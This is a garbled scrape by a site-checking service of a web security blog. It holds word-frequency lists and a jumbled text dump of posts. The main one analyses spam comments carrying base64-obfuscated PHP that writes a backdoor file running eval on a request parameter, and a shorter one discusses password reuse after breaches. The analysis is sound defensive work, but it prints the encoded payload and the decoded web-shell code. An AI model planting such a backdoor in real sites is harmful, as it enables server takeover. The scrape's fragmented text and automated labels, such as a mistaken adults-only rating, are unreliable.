If you are not sure if the website you would like to visit is secure, you can verify it here. Enter the website address of the page and see parts of its content and the thumbnail images on this site. None (if any) dangerous scripts on the referenced page will be executed. Additionally, if the selected site contains subpages, you can verify it (review) in batches containing 5 pages.
favicon.ico: webinsecurity.net - Web Insecurity.

site address: webinsecurity.net redirected to: webinsecurity.net

site title: Web Insecurity...

Our opinion (on Friday 15 May 2026 11:54:11 UTC):

website (probably) only for adults * website (probably) only for adults ! YELLOW status (not for everyone) - not for everyone
After content analysis of this website we propose the following hashtags:
#twitter


Meta tags:
Description=A web security blog discussing current news, research, and ideas related to safety, security and privacy on the web.;

Headings (most frequently used words):

2011, to, privacy, you, twitter, comprehensive, guide, monday, thursday, march, of, blog, 2012, tuesday, february, where, are, the, your, this, may, wednesday, 26, part, who, hears, what, say, january, on, as, news, in, retweeting, with, facebook, hacked, archive, search, tag, cloud, subscribe, 2013, july, 12, 28, september, friday, june, 24, april, 31, 15, 14, 27, falling, down, rabbit, hole, an, analysis, some, questionable, spam, should, really, change, re, used, passwords, after, breach, maybe, not, apparently, consumers, do, care, about, andrew, tanenbaum, security, vs, fun, loving, students, subject, and, pants, admit, laughed, lulzsec, popular, orgasms, experts, recommend, stronger, protections, for, geodata, built, location, settings, how, iphone, be, telling, everyone, live, moral, story, violating, retweets, lies, still, going, share, address, phone, external, sites, whom, confessing, free, wordpress, themes, considered, harmful, will, choice, social, authentication, face, captchas, lead, huge, gains, facial, recognition, software, my, account, got, zuckerberg,

Text of the page (most frequently used words):
the (233), that (131), you (124), and (111), privacy (55), but (53), your (51), for (50), this (42), can (42), they (39), have (38), what (35), with (35), are (35), about (33), their (27), facebook (25), not (25), #twitter (25), people (23), like (23), comments (22), more (22), some (22), location (22), just (21), when (21), data (21), security (21), from (20), how (20), many (20), who (20), information (20), where (19), could (18), one (18), might (18), really (17), were (17), posted (16), social (16), will (16), know (16), which (16), out (16), labels (15), those (15), wordpress (15), there (14), was (14), pretty (14), been (14), make (14), friends (14), all (14), code (14), say (14), now (13), may (13), even (13), going (13), part (13), passwords (13), here (12), them (12), don (12), get (12), actually (11), would (11), hacked (11), 2011 (11), something (11), than (11), someone (11), also (11), much (11), base64 (11), spam (11), php (11), news (10), such (10), without (10), private (10), share (10), web (10), has (9), account (9), into (9), isn (9), see (9), used (9), tell (9), site (9), want (9), any (9), lulzsec (9), hacking (8), given (8), public (8), think (8), authentication (8), new (8), using (8), blog (8), february (8), sharing (8), only (8), breach (8), posts (7), bad (7), behaviour (7), things (7), story (7), page (7), perhaps (7), thing (7), though (7), recognition (7), use (7), ways (7), password (7), free (7), then (7), should (7), read (7), first (7), time (7), little (7), march (7), message (7), often (7), probably (7), did (7), exploit (6), tweet (6), least (6), had (6), good (6), online (6), likely (6), captcha (6), still (6), because (6), different (6), themes (6), try (6), best (6), find (6), search (6), retweeting (6), while (6), way (6), possible (6), hears (6), case (6), file (6), photo (6), sensitive (6), bit (6), voting (6), change (6), _request (6), home (5), humour (5), zuckerberg (5), hack (5), down (5), before (5), got (5), does (5), rather (5), hacker (5), folk (5), facial (5), captchas (5), computer (5), lot (5), photos (5), give (5), why (5), let (5), looks (5), safe (5), whole (5), google (5), user (5), end (5), post (5), anyone (5), users (5), quite (5), settings (5), other (5), most (5), everyone (5), tweets (5), seeing (5), whether (5), being (5), doesn (5), feel (5), internet (5), personal (5), consumers (5), pants (5), 2012 (5), care (5), yahoo (5), string (5), analysis (5), eval (5), these (4), made (4), funny (4), article (4), spammy (4), com (4), didn (4), sure (4), maybe (4), sense (4), easier (4), sometimes (4), interesting (4), text (4), course (4), well (4), attack (4), doing (4), exactly (4), others (4), lead (4), gains (4), software (4), area (4), costumes (4), mean (4), seen (4), paper (4), few (4), pictures (4), person (4), across (4), thursday (4), bunch (4), sites (4), type (4), content (4), monday (4), app (4), seems (4), provide (4), iphone (4), phone (4), simple (4), put (4), feed (4), option (4), blocking (4), said (4), done (4), however (4), she (4), hard (4), since (4), clearly (4), comprehensive (4), guide (4), april (4), foursquare (4), advice (4), too (4), legislation (4), making (4), lulz (4), september (4), claims (4), after (4), inconvenienced (4), sony (4), july (4), javascript (4), base64_decode (4), executed (4), atom (3), fan (3), january (3), makes (3), both (3), talked (3), sort (3), research (3), heard (3), true (3), flickr (3), accounts (3), intended (3), researchers (3), turn (3), huge (3), secure (3), terriko (3), link (3), help (3), through (3), show (3), away (3), caught (3), example (3), blogs (3), places (3), run (3), found (3), theme (3), malicious (3), hear (3), basically (3), encoded (3), two (3), guess (3), come (3), over (3), points (3), reports (3), potentially (3), wasn (3), commissioner (3), tuesday (3), worth (3), recommend (3), own (3), format (3), become (3), starting (3), together (3), examples (3), network (3), either (3), list (3), retweets (3), cool (3), keep (3), actual (3), subject (3), cute (3), always (3), numbers (3), aware (3), seem (3), recent (3), off (3), meta (3), city (3), geodata (3), fact (3), live (3), favourite (3), take (3), presentation (3), geo (3), built (3), comes (3), picture (3), need (3), light (3), once (3), again (3), must (3), currently (3), protect (3), omelette (3), breaking (3), eggs (3), system (3), scam (3), bait (3), popular (3), came (3), june (3), breaches (3), preserving (3), very (3), organizations (3), business (3), compromised (3), credentials (3), changing (3), enough (3), trying (3), b64 (3), cache (3), ifooag (3), czlzyl (3), isset (3), b64decode (3), umi (3), subscribe (2), happened (2), according (2), reporting (2), http (2), twitpic (2), write (2), instead (2), taken (2), wednesday (2), laugh (2), frequently (2), attacks (2), act (2), nature (2), general (2), getting (2), within (2), hadn (2), large (2), obfuscated (2), asked (2), identify (2), profiles (2), etc (2), easy (2), regular (2), carefully (2), curious (2), current (2), assumptions (2), broken (2), attackers (2), our (2), nowadays (2), question (2), choice (2), face (2), law (2), stop (2), right (2), great (2), usual (2), include (2), involved (2), unless (2), mostly (2), between (2), image (2), processing (2), potential (2), better (2), showing (2), name (2), world (2), asks (2), future (2), pleasure (2), bother (2), install (2), themselves (2), links (2), definitely (2), stuff (2), thankfully (2), demonstrates (2), stats (2), avoid (2), encoding (2), average (2), place (2), unfortunately (2), never (2), unsafe (2), protection (2), enabling (2), iapps (2), developer (2), confession (2), age (2), sex (2), status (2), detailed (2), attractive (2), available (2), steal (2), ready (2), office (2), canada (2), ago (2), wrote (2), stalking (2), awkward (2), safety (2), policy (2), annoying (2), address (2), fascinated (2), yet (2), complex (2), note (2), networks (2), decided (2), regularly (2), everything (2), allowed (2), choose (2), following (2), anyhow (2), cut (2), retweet (2), repeat (2), edits (2), looked (2), followers (2), chose (2), believe (2), retweeted (2), reason (2), 2010 (2), title (2), expect (2), millions (2), exposed (2), telling (2), suspect (2), nothing (2), check (2), real (2), implications (2), stay (2), tuned (2), next (2), learn (2), nice (2), protecting (2), yelp (2), camera (2), cameras (2), aren (2), coordinates (2), services (2), shows (2), visible (2), hide (2), dangerous (2), taking (2), figure (2), relevant (2), cybercasing (2), joint (2), including (2), each (2), blame (2), sums (2), prefer (2), document (2), updates (2), cautious (2), pleaserobme (2), love (2), moment (2), point (2), called (2), says (2), red (2), districts (2), surely (2), gamblers (2), consistent (2), particular (2), related (2), geographic (2), customers (2), advertising (2), compromise (2), consensus (2), experts (2), argue (2), networking (2), professionals (2), phishing (2), short (2), version (2), funniest (2), admit (2), work (2), wouldn (2), another (2), 2008 (2), apparently (2), ever (2), today (2), orgasms (2), around (2), funnier (2), able (2), leave (2), exercise (2), reader (2), imagine (2), academia (2), andrew (2), tanenbaum (2), fun (2), loving (2), students (2), wtf (2), banking (2), quote (2), systems (2), consumer (2), speaker (2), understanding (2), released (2), important (2), financial (2), institutions (2), retailers (2), rejecting (2), voice (2), subsequent (2), breached (2), previously (2), assuming (2), itself (2), same (2), username (2), top (2), went (2), second (2), okay (2), full (2), access (2), server (2), circles (2), yup (2), decoding (2), execute (2), piece (2), strings (2), waiting (2), outside (2), request (2), analyzing (2), stripslashes (2), qgv0wyovli8 (2), badstring1 (2), falling (2), rabbit (2), hole (2), 2013 (2), october (2), november (2), december (2), insecurity (2), webinsecurity, net, older, honestly, happen, edit, blames, bug, hah, flagging, tech, crunch, abusive, classy, 3thf68, snipeyhead, obviously, appear, his, grabbed, screenshot, amusing, techcrunch, suggesting, mark, wondering, occur, conceptualize, happens, opposed, akin, guy, robbed, deal, somehow, accept, retribution, disturbingly, approach, explain, apathetic, response, routine, violations, offline, jeremiah, grossman, bite, sized, wisdom, considerably, group, hardly, idea, scale, implementation, calling, reading, normal, jilted, lover, angry, sibling, presumably, pass, key, hackable, crafted, require, human, necessary, thus, slowing, works, practice, mangled, form, relied, ineffectiveness, rapidly, determined, improved, algorithms, bypassed, higher, success, rate, websearch, overdue, enforcement, hoping, crime, terrorism, technology, poor, arresting, innocent, cases, wearing, makeup, lighting, poses, hair, beyond, halloween, theatre, geeks, haunted, house, aficionados, society, creative, anachronism, acquaintances, penchant, elabourate, trouble, identifying, standard, torn, excitement, vague, unease, contemplate, applications, members, 501st, legion, star, wars, costumers, costume, traditional, verify, identity, writes, rice, ask, hackers, halfway, nevermind, virus, stayed, porn, screensavers, cross, scripting, eye, illegal, adding, seo, boosting, dubious, properties, worse, elsewhere, visitors, computers, hiding, template, downloaded, random, understand, awfully, wary, author, tools, figuring, antivirus, scanner, authenticity, checker, ten, iffy, included, doubt, knows, thousands, downloading, websites, gives, anywhere, else, harder, gauge, considered, harmful, abuzz, entire, entitled, fess, selling, appears, feature, lock, sinnin, missing, collect, marital, paired, transgressions, profile, marketers, details, collection, provided, collecting, knowing, commandments, thou, shalt, jess, confessions, blessing, received, approval, church, whom, confessing, month, shortly, thereafter, pulled, plan, along, buy, targeted, advertisement, levels, harassment, adveritisers, totally, bucks, women, metro, having, contact, updated, sounds, back, table, calls, junk, mail, old, external, saying, readable, surface, simplest, maintain, regardless, individuals, hugely, effective, log, necessarily, gossip, fairly, common, parlance, verbatim, small, length, addition, commentary, harmless, winding, strangers, otherwise, positive, cause, chosen, boss, political, views, seriously, winds, violate, expectation, appeared, cheesy, clients, block, feeds, manner, continue, climb, problematic, wound, forget, cats, minded, noting, assumed, exposures, equally, paste, minor, stopping, significantly, damaging, reputation, refute, deleted, offending, serve, reminder, checkbox, week, defamation, lawsuit, hate, kittens, lies, collected, million, exposing, iwantprivacy, widespread, violation, violating, responsible, entails, job, includes, missed, talks, scary, turning, refusing, sign, giving, game, moral, view, exif, exchangeable, extended, allow, generalize, precisely, map, zoom, issue, recorded, default, parent, realized, teenage, daughter, herself, her, bedroom, turned, predator, lived, last, party, told, involves, william, shatner, accidentally, revealing, secret, studio, recording, craigslist, expensive, items, exact, geolocation, times, call, interested, buyer, friedland, sommer, started, looking, highly, flip, look, catch, presenting, enjoyed, slides, informative, hotsec, tagging, modern, smartphones, gps, store, every, sorting, later, stored, took, shared, expert, although, explains, precise, complete, parade, truck, spilled, delicious, candy, roadway, please, tweeting, careful, amount, clear, recover, oops, realise, waaay, delete, neat, meet, latitude, year, set, handy, based, checkins, authors, oversharing, disabled, letting, perfectly, reasonable, less, thrilled, writers, legislators, convincing, reasons, sound, compulsive, alcoholics, conceived, entirely, socially, appealing, especially, convince, helpful, jessen, situation, tracking, intrusion, loss, integrity, apparent, constant, monitoring, combined, demographic, bars, casinos, adds, established, behavioural, purposes, basis, anonymised, individual, subsumed, exists, definition, usa, regions, major, trading, partners, essential, digital, formed, soon, transitional, period, sellers, improve, confidence, commerce, mobile, computing, genetic, stronger, protections, ignoring, past, weeks, mention, latest, gang, profit, justice, state, obvious, layperson, joke, oxymoron, demonstrate, researcher, antics, kinda, wish, stolen, immune, salivate, ethics, committee, touch, excellent, graham, cluley, discovers, purports, sleuths, pixelated, arrested, means, newsworthy, scams, chuckle, thought, midst, explaining, media, attributes, anything, dislike, button, celebrity, tapes, obama, discovered, hope, running, pummelling, powerful, organisations, ground, laughs, shits, giggles, tells, secretly, laughed, friday, proofreading, afternoon, typo, illustrate, popped, head, geek, whose, famous, clicking, breeches, dressed, tomorrow, laughing, function, basic, finding, non, tempting, contest, illustration, breech, quickly, cnewtoncom, regarding, ospf, 4th, modicum, required, prevent, spoofing, routers, sending, false, routing, discussions, via, report, suggests, shopping, canadian, drew, wonder, indicate, businesses, winning, simply, backed, constructed, evaluate, spurious, brings, issues, worldwide, astute, evaluated, decisions, spend, money, relative, organization, occurs, attended, talk, yesterday, quoted, official, claimed, voters, terrifying, joked, kid, likes, cake, healthy, its, despite, strides, implemented, rarely, officials, roll, flaws, willing, overlook, convenience, sake, cognitive, mistakes, electronic, frontier, foundation, concerns, actively, diminishing, trust, instance, listed, considerations, trusted, adequately, sharper, disconnect, naming, priority, trusting, edelman, study, yours, website, overwhelmed, sanitized, unsurprisingly, haven, changed, previous, whit, high, publicity, surprised, reminded, papers, cormac, herley, practices, waste, risks, skip, incident, sadly, definitive, analyze, reuse, owner, noticed, noticing, global, term, decision, assume, alleged, hoax, apps, suspiciously, statistically, speaking, failing, hurt, denizens, hitting, avenue, foolish, keeping, considering, savvy, depends, rolling, dice, long, thanks, externalities, rational, rejection, suffered, email, 453, 000, allegedly, clearing, queues, morning, sample, commonly, obfuscate, comment, clue, hint, line, uses, padding, decoded, opened, python, ran, wanted, none, useful, talking, learned, open, under, directory, needs, quick, bet, opening, modifying, existing, character, sequences, gobbledegook, accepts, style, delineated, remove, parse, quotes, concatenations, close, rid, incidentally, expression, robust, against, nestings, whatnot, vim, removing, stick, concatenated, added, entity, fully, executing, payload, foil, scanners, wise, spammers, add, preparation, big, launched, machines, prepared, starts, logs, saw, stops, indeed, queue, discarded, wondered, suggest, akismet, moderating, safest, kludgy, render, unusable, meanwhile, hand, gave, similar, happy, strip, slashes, zyl, trpq, h49, a93, mym, jya, qol4, bakm, nwki, o_k, ak4t, ushmy, uakaf, hoh, pou, yyp3zu, uliu, fty, z6ue, jb8, bwg, badstring1a, lyp3y2a7ccovawyvknchblsqlygvkl5zwyfucnbr, ki9pc3nldc8queg0oxxaki8olyp4ygpwku4qlyrf, ukvrvuvtvc8qcib4ki9blyooflfxki8nyycvkje, gv0wyovli8qpswpki8neicvknvuqtkzki8ulypde, 0c6qdrcki8nbccvkjh0ig8qly4vkm15tt08rgaql, yd6jy8qegdnmxy2msovli8qvnbjzzqqlyd5jy8qz, xxqeueqly4vkix2kcovj2wnlypglvfvtdqql10vk, mjha00pki8vklw7c24qlykvkk53s0knxyovlyppx, 2sqlykvkkhayus0vcovzxzhbc8qmk58mja, ki8ol, ypvc0htwv1lwiovc3ryaxbzbgfzagvzlyo8sgczk, i8olypvquthziovjf9srvfvrvnulypwlktuihsql, 1svkkstlmmqlydjjy8qsg9oki8ulypytjthki8ne, icvkjsmmygymwqmxsovli8qo1bpdsovj2wnlypzw, vazenuqly4vklvsavutki8nenlsjy8qrlrzxdqql, 10vkk4, k2yqly8qsytlqyovks8qbebqki8vk, mjypcovks8qolo2vuuoski4ki8vkkjxzztasyovo, y8qrtsrdidjki8, lyp3y2a7ccovawyvkn, chblsqlygvkl5zwyfucnbrki9pc3nldc8queg0ox, xaki8olyp4ygpwku4qlyrfukvrvuvtvc8qcib4ki, 9blyooflfxki8nyycvkje, pswpki8neicvknvuqtkzki8ulypde0c6qdrcki8n, bccvkjh0ig8qly4vkm15tt08rgaqlyd6jy8qegdn, mxy2msovli8qvnbjzzqqlyd5jy8qzxxqeueqly4v, kix2kcovj2, wnlypglvfvtdqql10vkmjha, 00pki8vklw7c24qlykvkk53s0knxyovlyppx2sql, ykvkkhayus0vcovzxzhbc8qmk58mja, ki8olypvc, 0htwv1lwiovc3ryaxbzbgfzagvzl, yo8sg, czki8olypvquthziovjf9srvfvrvnulypwlktuih, sql1svkkstlmmqlydjjy8qsg9oki8ulypytjthki, 8neicvkjsmmygymwqmxsovli8qo1bpdsovj2wnly, pzwvaz, enuqly4vklvsavutki8nenlsjy8, qrlrzxdqql10vkk4, k2yqly8qsytlqyovks8, qbebqki8vkmjypcovks8qolo2vuuoski4ki8vkkj, xzztasyovoy8qrtsrdidjki8, cgi, escape, lte1, fclose, lo2vuuoski4ki8vkkjxzztasyovoy8qrtsrdidjki8, kcp, wmf, p_we, k2yqly8qsytlqyovks8qbebqki8vkmjypcovks8qo, ymwqmxsovli8qo1bpdsovj2wnlypzwvaz, enuqly4vklvsavutki8nenlsjy8qrlrzxdqql10vk, vkkstlmmqlydjjy8qsg9oki8ulypytjthki8neicvkjsmmyg, 8sgczki8olypvquthziovjf9srvfvrvnulypwlktuihsql1s, 1lwiovc3ryaxbzbgfzagvzl, yabk, sqlykvkkhayus0vcovzxzhbc8qmk58mja, ki8olypvc0htwv, qql10vkmjha00pki8vklw7c24qlykvkk53s0knxyovlyppx2, yat, 5dw, wnlypglvfvtd, mxy2msovli8qvnbjzzqqlyd5jy8qzxxqeueqly4vkix2kcov, qdrcki8nbccvkjh0ig8qly4vkm15tt08rgaqlyd6jy8qegdn, qpswpki8neicvknvuqtkzki8ulypde0c6, ib4ki9blyooflfxki8nyycvkje, ozm52, 3nldc8queg0oxxaki8olyp4ygpwku4qlyrfukvrvuvtvc8qc, lyp3y2a7ccovawyvknchblsqlygvkl5zwyfucnbrki9pc, fputs, fopen, import, awyojgy9zm9wzw4oj3dwlwnvbnrlbnqvy2fjaguv, awzvb2fnlnbocccsj3cnksl7znb1dhmojgysjzw, ghwic8qcgshv1uql2v2ywwvknpdrni4ejqqlygvk, i1mjwymzyovymfzzty0x2rly29kzs8qy2hiig0ql, ygvknzxxneql1wnthlvl05tchllatlwwmk4cu9en, upum2nxthlndktsdhzlu292yvhoelpyuxzla2m2w, tnrcux5z3zlauzqwerrcux5umzva1zsvlvwvfzdo, hfju3r5s1rgnkldb3zxethxv0rkblndb3zcjy8qd, 0vejsovli8qwna2oniql1wnsjjnbkx5b2hsu0vxt, hk0dktrzevsu3rrs2k4bmvpy3zla2nyuuvzd09db, 3zmathxufu5ruxqqtzuaw92sjj3bkx5cdhkre14u, knvdkxpohflvfiwt2xoc2myz3fmewq2zvd3bkx5c, frcjy8qq01mrzeqly4vkmluevuwflaql1wnvfzbd, fftb3zyuzhxsnpaufr5mhfmethxvfzoylpdb3zlu, zhxweu1tu1tb3zmexb1sjfzcux5a3zlavz5y0n4a, etpowxkbuzzthlwtkxsehblathvthlwdfvtndfjs, gxts2k5emrisnbcjy8qxxgyzcovli8qig5ski9cj, 2nitnnzwe5vwlhndktrbytirghrs2k4b0x5bzfoa, 3hzvtb0z1rtb3zkrjltulzgvljwtlvmexbpwgt0y, vf6d3fmmxn2s201twnrwxpjeufxthlkakp5ohfiq, 3rly2lvdkxpohfuuzfuxccvkmhccghpki8ulypjv, z4ql1wns2k4bmvpy3zlauzgtmlvdkxpohfvewrlu, vnvdkoyd25mexb1s1zwquxpb3zmathxykzov1beo, w9au292sjnvbkx5cfzjrk1xthk0dktqrkflme1zs, 2k4bmvty3zlajk4v3lvdkxpohfcjy8qpe9rnxbmk, i8ulyo0vlhfki9cj1vtodjvew92sjj3bkx5cfzur, m9xtdewdktpwjnoq292thlvl0xxwjvlathwthlvl, 01urxfmethxsjn4zlftb3zluzhxt2psslrgsxfme, thxyjbneffty3jku292t3k4cwvwbzvuew92xccvk, iazxccqlykvklpswyuqly8qlvrpjudiniovks8qu, yw3bjrtlcovlypcq1sqlzsvkkxachm8blnaki8, icpo2zjbg9zzsgkzik7fq, awyojgy9zm9wzw4oj3dw, lwnvbnrlbnqvy2fjaguvawzvb2fnlnbocccsj3cn, ksl7znb1dhmojgysjzw, cghwic8qtivqycuql2v2, ywwvkklmxccslsovkc8qpjzgsguql2jhc2u2nf9k, zwnvzguvkkbnktiqlygvkn46sduql1wnthlwm1ky, qtdjq292yvdzdktuy2hibhnxthlndktsnxpxeuzv, y25cuktpoxbjm05szem4cvvfzzbpwhhbs2k4b0x5, cdrzr3bxs1u0cux5umzva1zsvlvwvfzdohfjaui0, s2k5ykx5b29mbez4s2k4bll5y3zlakuvuudwmfd5, b3zmathcjy8qt3pnntiwki8ulyo5sisski9cj3fq, u3dws2k4bmvpy3zlblzvuvrrektpohvmexbeztbj, nlfeumnlathuyknjdktqadbjrzhxthk0dkttmtvu, vda4ukdbcux5zdzkethxzudkbk1ywtjnu292tgk4, cvzuqkpaelfxthlknup5ohfawhhxzvvfcux5nhzl, axgys0nvdkoyxccvknlbdcyqly4vkka1rhcmxu4q, l1wnd25mexbhtfzgdlreuxfmmtb2s21kagewmhbl, ath2s2x3n2mynhfmewt2s2s1m1mwa25yew92thlw, ufgyc3fmewt2s2toqvlvczbwq292wlhaagjdohfn, azu4twpbk0tpog9mexbwyzbodfdwmwxxaw92yzns, ewfyqnpir0z6yudwekxcjy8qwwfiayovli8qt35x, cyovxcd5bzhtr2n6s2k4b0x5cfzrvxrowmlvdkpg, ovnsvkzwulzovux5cfdma3rvsuhzcuwxc3zla3n0, tg1ncux5zgpkethxu0c5b0tpohvmexbzvgp0setp, og5lawn2s2pzbu15z3lnv1ftwfnvdkxpohfpmujq, zfnvdkoyd25mexbav1zbelwnlyp7wup9msovli8q, disolttrki9cj2vuvxfmetr2s2xwc2fwvxrlathu, zw5sc0p5ohfsbfjawerrcuwxmhzlazqvvw1jk0sy, wxfmethxu3l0tff5b3zluzhxykvccutpohzlbupz, uenvdkttohfpbg8yvlvvb1nrstrlath2s2tkwfp6, deftew92t3k4cvjuc3jkawrks2k4pvwnlyooa0nw, qfk, ki8plypgymmqly8qshzeisovks8qv21gki8v, klbfv2vgyd57ki87lyotfgxurteqlz8, jyk7zmns, b3nlkcrmktt9, warning, entry, contains, html, escaped, viewing, mess, browser, logged, questionable, xss, w2sp, video, survey, ssl, sql, injection, sexting, plagiarism, patents, laws, games, firefox, communication, clickjacking, bugs, barcode, ajax, contract, soma, physical, effect, credit, card, copyright, buzzwords, browsers, ads, noscript, firesheep, error, messages, ccs, disabling, usability, tag, cloud, 2009, august, archive, resources,


Text of the page (random words):
3zlauzgtmlvdkxpohfvewrlu vnvdkoyd25mexb1s1zwquxpb3zmathxykzov1beo w9au292sjnvbkx5cfzjrk1xthk0dktqrkflme1zs 2k4bmvty3zlajk4v3lvdkxpohfcjy8qpe9rnxbmk i8ulyo0vlhfki9cj1vtodjvew92sjj3bkx5cfzur m9xtdewdktpwjnoq292thlvl0xxwjvlathwthlvl 01urxfmethxsjn4zlftb3zluzhxt2psslrgsxfme thxyjbneffty3jku292t3k4cwvwbzvuew92xccvk iazxccqlykvklpswyuqly8qlvrpjudiniovks8qu yw3bjrtlcovlypcq1sqlzsvkkxachm8blnaki8 p icpo2zjbg9zzsgkzik7fq as you can tell from the first sample it s base64 encoded something b64 is pretty commonly used by attackers to obfuscate their code so in case the spammy username and comment that went with the code wasn t enough to tell me that something bad was intended the b64 encoding itself would have been a clue if i didn t have the pretty huge hint of the base64_decode line i might have been able to figure it out from the format and the fact that i know that b64 uses as a padding visible at the end of the second string being a curious sort of person i decoded the first string in my case i just opened up python and did this import base64 base64 b64decode badstring1 if f fopen wp content cache ifooag php w fputs f php n p eval if 6 he base64_decode m 2 h5 lyp3y2a7ccovawyvknchblsqlygvkl5zwyfucnbrki9pc 3nldc8queg0oxxaki8olyp4ygpwku4qlyrfukvrvuvtvc8qc ib4ki9blyooflfxki8nyycvkje qgv0wyovli8 ozm52 0 9j qpswpki8neicvknvuqtkzki8ulypde0c6 qdrcki8nbccvkjh0ig8qly4vkm15tt08rgaqlyd6jy8qegdn mxy2msovli8qvnbjzzqqlyd5jy8qzxxqeueqly4vkix2kcov j2 yat 5dw n wnlypglvfvtd qql10vkmjha00pki8vklw7c24qlykvkk53s0knxyovlyppx2 sqlykvkkhayus0vcovzxzhbc8qmk58mja ki8olypvc0htwv 1lwiovc3ryaxbzbgfzagvzl yabk o qs yo 8sgczki8olypvquthziovjf9srvfvrvnulypwlktuihsql1s vkkstlmmqlydjjy8qsg9oki8ulypytjthki8neicvkjsmmyg ymwqmxsovli8qo1bpdsovj2wnlypzwvaz yj 1 v k enuqly4vklvsavutki8nenlsjy8qrlrzxdqql10vk k4 umi k2yqly8qsytlqyovks8qbebqki8vkmjypcovks8qo lo2vuuoski4ki8vkkjxzztasyovoy8qrtsrdidjki8 kcp y bc hv wmf p_we lte1 fclose f well okay i actually ran cgi escape base64 b64decode badstring1 to get the version you re seeing in the blog post since i wanted to make sure none of that was executed but that s not relevant to the code analysis just useful if you re talking about code on the internet so that still looks pretty obfuscated and even more full of base64 yo i heard you like base64 so i put some base64 in your base64 but we ve learned a new thing the code is trying to open up a file in the wordpress cache called ifooag php under wp content which is a directory wordpress needs to have write access to i did a quick web search and found a bunch of spam so my bet is that they re opening a new file rather than modifying an existing one and we can tell that they re trying to put some php into that file because of the php and which are character sequences that tell the server to run some php code but that code still looks pretty much like gobbledegook if you know a bit about php you ll know that it accepts c style comments delineated by and so we can remove those from the php code to get something a bit easier to parse eval base64_decode lyp3y2a7ccovawyvkn chblsqlygvkl5zwyfucnbrki9pc3nldc8queg0ox xaki8olyp4ygpwku4qlyrfukvrvuvtvc8qcib4ki 9blyooflfxki8nyycvkje qgv0wyovli8 q pswpki8neicvknvuqtkzki8ulypde0c6qdrcki8n bccvkjh0ig8qly4vkm15tt08rgaqlyd6jy8qegdn mxy2msovli8qvnbjzzqqlyd5jy8qzxxqeueqly4v kix2kcovj2 wnlypglvfvtdqql10vkmjha 00pki8vklw7c24qlykvkk53s0knxyovlyppx2sql ykvkkhayus0vcovzxzhbc8qmk58mja ki8olypvc 0htwv1lwiovc3ryaxbzbgfzagvzl yo8sg czki8olypvquthziovjf9srvfvrvnulypwlktuih sql1svkkstlmmqlydjjy8qsg9oki8ulypytjthki 8neicvkjsmmygymwqmxsovli8qo1bpdsovj2wnly pzwvaz enuqly4vklvsavutki8nenlsjy8 qrlrzxdqql10vkk4 umi k2yqly8qsytlqyovks8 qbebqki8vkmjypcovks8qolo2vuuoski4ki8vkkj xzztasyovoy8qrtsrdidjki8 feel like we re going in circles yup that s another base64 encoded string so let s take out the quotes and the concatenations to see what that is lyp3y2a7ccovawyvknchblsqlygvkl5zwyfucnbr ki9pc3nldc8queg0oxxaki8olyp4ygpwku4qlyrf ukvrvuvtvc8qcib4ki9blyooflfxki8nyycvkje q gv0wyovli8qpswpki8neicvknvuqtkzki8ulypde 0c6qdrcki8nbccvkjh0ig8qly4vkm15tt08rgaql yd6jy8qegdnmxy2msovli8qvnbjzzqqlyd5jy8qz xxqeueqly4vkix2kcovj2wnlypglvfvtdqql10vk mjha00pki8vklw7c24qlykvkk53s0knxyovlyppx 2sqlykvkkhayus0vcovzxzhbc8qmk58mja ki8ol ypvc0htwv1lwiovc3ryaxbzbgfzagvzlyo8sgczk i8olypvquthziovjf9srvfvrvnulypwlktuihsql 1svkkstlmmqlydjjy8qsg9oki8ulypytjthki8ne icvkjsmmygymwqmxsovli8qo1bpdsovj2wnlypzw vazenuqly4vklvsavutki8nenlsjy8qrlrzxdqql 10vkk4 umi k2yqly8qsytlqyovks8qbebqki8vk mjypcovks8qolo2vuuoski4ki8vkkjxzztasyovo y8qrtsrdidjki8 you might think we re getting close now but here s what you get out of decoding that base64 b64decode badstring1a wc p if w n s trpq isset p h49 x jv n _request r x qq c 1 et z ut a93 c g 4 l 8t o mym e jya v l f qol4 bakm sn nwki _ o_k h ak4t ev al 2n 20 ushmy ez stripslashes g3 uakaf _request v kt k c c hoh xn g z 3 2 1d pou l yyp3zu uliu z yl fty 4 n rb f k kc l j bx z6ue jb8 bwg k e v i yup definitely going in circles but at least we know what to do get rid of the comments again incidentally i m just using a simple regular expression to do this s g that s not robust against all possible nestings or whatnot but it s good enough for simple analysis i actually execute it in vim as s gc and then check each piece as i m removing it here s what it looks like without the comments if isset _request c z l z y l eval stripslashes _request c z l zyl so let s stick together those concatenated strings again if isset _request czlzyl eval strip slashes _request czlzyl okay so now it s added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed that s actually pretty interesting it s not fully executing the malicious payload now it s waiting for an outside request is this to foil scanners that are wise to the type of things spammers add to blogs or is this in preparation for a big attack that could be launched all at once once the machines are prepared it s going to go to be a request that starts like this http example com wp content cache ifooag php czlzyl unfortunately i don t have access to the logs for the particular site i saw this on so my analysis stops here and i can t tell you exactly what it was going to try to execute but i think it s pretty safe to say that it wouldn t have been good i can tell you that there is no such file on the server in question and indeed the code doesn t seem to have been executed since it got caught in the spam queue and discarded by me but if you ve ever had a site compromised and wondered how it might have been done now you know a whole lot more about the way it could have happened all i can really suggest is that spam blocking is important these comments were caught by akismet and that if you can turn off javascript while you re moderating comments that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying thankfully it doesn t render it unusable meanwhile want to try your own hand at analyzing code i only went through the full decoding for the first of the two strings i gave at the top of this post but i imagine the second one is very similar to the first so i leave it as an exercise to the reader happy hacking posted at 4 24 p m 0 comments labels bad behaviour exploit javascript php spam wordpress thursday july 12 2012 should you really change your re used passwords after a breach maybe not the news is reporting that 453 000 credentials were allegedly taken from yahoo and current reports say that it s probably yahoo voice that was compromised if you want to know if yours is in there it seems like the hacker website is overwhelmed at the moment but you can search for your username email here on a sanitized list that doesn t include the passwords probably unsurprisingly the next bit of news is that people haven t changed their hacked passwords from previous breaches to whit 59 of people were re using the passwords that had previously been hacked and released to the public in the sony breach which seems a bit high given the publicity but i m not as surprised as i maybe should be what i d really like to know is how many of those people actually suffered from this password re use did anyone bother to try re using their credentials i m reminded of one of my favourite security papers so long and no thanks for the externalities the rational rejection of security advice by users by cormac herley in it he claims that many security best practices like changing passwords frequently are actually a waste of time for the average user when you take into account the risks involved so is changing a password after a breach one of those things that we can skip without much incident sadly i don t have any definitive way to analyze how many folk were inconvenienced by their password reuse in the sony and subsequent yahoo breaches but i can make a guess if those accounts were compromised on yahoo after the sony breach we d be seeing a lot more people changing their passwords between the two so probably at least those 59 were not inconvenienced enough to change their 